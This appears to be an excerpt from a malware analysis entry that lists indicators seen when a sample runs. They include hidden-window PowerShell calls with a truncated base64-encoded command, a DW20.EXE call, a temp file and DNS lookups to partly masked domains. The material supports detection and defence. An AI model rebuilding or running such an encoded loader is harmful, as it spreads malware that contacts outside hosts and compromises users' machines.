Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAGMARABBAEEARAAgAD0AIAAnADMAMAA2ACcAOwAkAGMAYwBVAEcAMQBBAGMAQQA9ACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBCAEcAUQAnACwAJwBCAEIAQQAnACkAOwAkAGMARwBBAEEAQQA0AEIAQQA9ACQAZQBuAHYAOgB1AHMAZQByAH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1508
- %TEMP%\1347630.cvr
- DNS ASK na####nebolango.com
- DNS ASK an##op.xyz
- DNS ASK wo############591-66491-179337.cloudwaysapps.com
- DNS ASK we#####osspalace.com
- DNS ASK re###wtral.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAGMARABBAEEARAAgAD0AIAAnADMAMAA2ACcAOwAkAGMAYwBVAEcAMQBBAGMAQQA9ACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBCAEcAUQAnACwAJwBCAEIAQQAnACkAOwAkAGMARwBBAEEAQQA0AEIAQQA9ACQAZQBuAHYAOgB1AHMAZQByAH...' (with hidden window)